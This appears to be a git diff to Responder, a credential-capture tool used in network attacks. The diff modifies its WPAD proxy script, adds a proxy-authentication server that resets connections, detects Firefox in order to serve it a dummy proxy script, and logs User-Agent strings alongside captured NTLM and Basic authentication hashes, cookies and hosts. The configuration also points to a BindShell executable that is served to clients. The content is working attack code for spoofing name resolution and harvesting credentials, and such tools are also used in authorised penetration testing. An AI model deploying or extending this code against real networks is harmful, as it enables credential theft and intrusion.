diff --git a/Responder.conf b/Responder.conf index 6263e6b..3b66777 100644 --- a/Responder.conf +++ b/Responder.conf @@ -42,11 +42,11 @@ RespondToName = ; Specific IP Addresses not to respond to (default = None) ; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10 -DontRespondTo = +DontRespondTo = ; Specific NBT-NS/LLMNR names not to respond to (default = None) ; Example: DontRespondTo = NAC, IPS, IDS -DontRespondToName = +DontRespondToName = ISATAP ; If set to On, we will stop answering further requests from a host ; if a hash hash been previously captured for this host. @@ -79,7 +79,7 @@ ExeFilename = files/BindShell.exe ExeDownloadName = ProxyClient.exe ; Custom WPAD Script -WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';} +WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';} ; HTML answer to inject in HTTP responses (before tag). ; Set to an empty string to disable. diff --git a/Responder.py b/Responder.py index 99e03d5..8da125e 100755 --- a/Responder.py +++ b/Responder.py @@ -20,7 +20,7 @@ import ssl from SocketServer import TCPServer, UDPServer, ThreadingMixIn from threading import Thread from utils import * - +import struct banner() parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0]) @@ -77,6 +77,16 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass TCPServer.server_bind(self) +class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer): + def server_bind(self): + if OsInterfaceIsSupported(): + try: + self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0') + except: + pass + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) + TCPServer.server_bind(self) + class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): def server_bind(self): MADDR = "224.0.0.251" @@ -113,6 +123,7 @@ ThreadingUDPServer.allow_reuse_address = 1 ThreadingTCPServer.allow_reuse_address = 1 ThreadingUDPMDNSServer.allow_reuse_address = 1 ThreadingUDPLLMNRServer.allow_reuse_address = 1 +ThreadingTCPServerAuth.allow_reuse_address = 1 def serve_thread_udp_broadcast(host, port, handler): try: @@ -160,6 +171,17 @@ def serve_thread_tcp(host, port, handler): except: print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running." +def serve_thread_tcp_auth(host, port, handler): + try: + if OsInterfaceIsSupported(): + server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler) + server.serve_forever() + else: + server = ThreadingTCPServerAuth((host, port), handler) + server.serve_forever() + except: + print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running." + def serve_thread_SSL(host, port, handler): try: @@ -207,7 +229,7 @@ def main(): if settings.Config.ProxyAuth_On_Off: from servers.Proxy_Auth import Proxy_Auth - threads.append(Thread(target=serve_thread_tcp, args=('', 3128, Proxy_Auth,))) + threads.append(Thread(target=serve_thread_tcp_auth, args=('', 3128, Proxy_Auth,))) if settings.Config.SMB_On_Off: if settings.Config.LM_On_Off: diff --git a/packets.py b/packets.py index 560a3b0..182ec1d 100644 --- a/packets.py +++ b/packets.py @@ -1583,3 +1583,4 @@ class SMB2Session2Data(Packet): ]) + diff --git a/servers/HTTP.py b/servers/HTTP.py index f1db943..5d17fa5 100644 --- a/servers/HTTP.py +++ b/servers/HTTP.py @@ -14,9 +14,9 @@ # # You should have received a copy of the GNU General Public License # along with this program. If not, see . +import struct from SocketServer import BaseRequestHandler, StreamRequestHandler from base64 import b64decode -import struct from utils import * from packets import NTLM_Challenge @@ -103,9 +103,26 @@ def GrabReferer(data, host): return Referer return False +def SpotFirefox(data): + UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data) + print text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2)) + if UserAgent: + IsFirefox = re.search('Firefox', UserAgent[0]) + if IsFirefox: + print color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1) + print color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1) + return True + else: + return False + def WpadCustom(data, client): Wpad = re.search(r'(/wpad.dat|/*\.pac)', data) - if Wpad: + if Wpad and SpotFirefox(data): + Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}") + Buffer.calculate() + return str(Buffer) + + if Wpad and SpotFirefox(data) == False: Buffer = WPADScript(Payload=settings.Config.WPAD_Script) Buffer.calculate() return str(Buffer) diff --git a/servers/Proxy_Auth.py b/servers/Proxy_Auth.py index cf6edc3..c7c8adc 100644 --- a/servers/Proxy_Auth.py +++ b/servers/Proxy_Auth.py @@ -19,6 +19,10 @@ from HTTP import ParseHTTPHash from packets import * from utils import * +def GrabUserAgent(data): + UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data) + print text("[Proxy-Auth] %s" % color("User-Agent : "+UserAgent[0], 2)) + def GrabCookie(data): Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data) @@ -59,13 +63,15 @@ def PacketSequence(data, client): if Packet_NTLM == "\x03": NTLM_Auth = b64decode(''.join(NTLM_Auth)) ParseHTTPHash(NTLM_Auth, client, "Proxy-Auth") + GrabUserAgent(data) GrabCookie(data) GrabHost(data) - return False + return False #Send a RST with SO_LINGER when close() is called (see Responder.py) else: return False elif Basic_Auth: + GrabUserAgent(data) GrabCookie(data) GrabHost(data) ClearText_Auth = b64decode(''.join(Basic_Auth)) @@ -90,12 +96,7 @@ def PacketSequence(data, client): return str(Response) class Proxy_Auth(SocketServer.BaseRequestHandler): - - def server_bind(self): - self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1) - self.socket.bind(self.server_address) - self.socket.setblocking(0) - self.socket.setdefaulttimeout(1) + def handle(self): try: @@ -106,3 +107,4 @@ class Proxy_Auth(SocketServer.BaseRequestHandler): except: pass +